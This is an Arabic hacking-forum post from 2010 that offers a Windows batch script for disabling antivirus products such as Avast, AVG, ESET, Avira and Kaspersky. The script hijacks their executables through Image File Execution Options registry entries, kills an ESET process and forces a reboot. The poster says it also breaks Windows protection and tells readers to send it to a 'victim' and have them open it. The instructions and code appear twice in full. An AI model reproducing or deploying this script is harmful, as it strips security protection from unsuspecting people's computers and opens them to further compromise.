hitboy
11-11-2010, 10:48 PM
لمن يهمه الأمر هذا الملف حضرته وجمعتلكم فيه أغلب معطلات الأنتيفيروس كالكسكبارسكي والاي في جي وماشابه وملاحضة أنها أيضا تحطم الحماية للويندوز .
ولكيفية التشغيل ارساله للضحية وأمره بفتحها فقط .
هنا الرابط تم حذف الرابط من باب الامان
انسخ الاكواد ولصقها بالمفكره ولا النوت باند وحفضها بأمتداد bat مثلا kil.bat
#echo off
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashDisp.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswupdsv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashserv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashMaisv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ash***sv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashQuick.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sched.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VisthUpd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVASTSS.scr" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSimpl.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashCmd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSimp2.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashEnhcd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
#echo off
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcfgex.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcmgr.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgdumpx.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgemc.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgfrw.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgiproxy.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnsx.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgscanx.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgtray.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgupd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fixcfg.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
#echo off
taskkill /im egui.exe /f /t
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysRescue.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysInspector.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
#echo off
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnt.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avwsc.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\update.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sched.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardgui.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avupgsvc.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avadmin.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
#echo off
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
shutdown -f -r -t 0
ولكيفية التشغيل ارساله للضحية وأمره بفتحها فقط .
هنا الرابط تم حذف الرابط من باب الامان
انسخ الاكواد ولصقها بالمفكره ولا النوت باند وحفضها بأمتداد bat مثلا kil.bat
#echo off
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashDisp.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswupdsv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashserv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashMaisv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ash***sv.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashQuick.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sched.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VisthUpd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVASTSS.scr" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSimpl.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashCmd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSimp2.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashEnhcd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
#echo off
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcfgex.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcmgr.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgdumpx.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgemc.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgfrw.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgiproxy.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnsx.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgscanx.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgtray.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgupd.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fixcfg.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
#echo off
taskkill /im egui.exe /f /t
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysRescue.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysInspector.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
#echo off
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnt.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avwsc.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\update.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sched.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardgui.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avupgsvc.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avadmin.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
#echo off
start Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe" /v "Debugger" /t "REG_SZ" /d "ntsd -d" /f
shutdown -f -r -t 0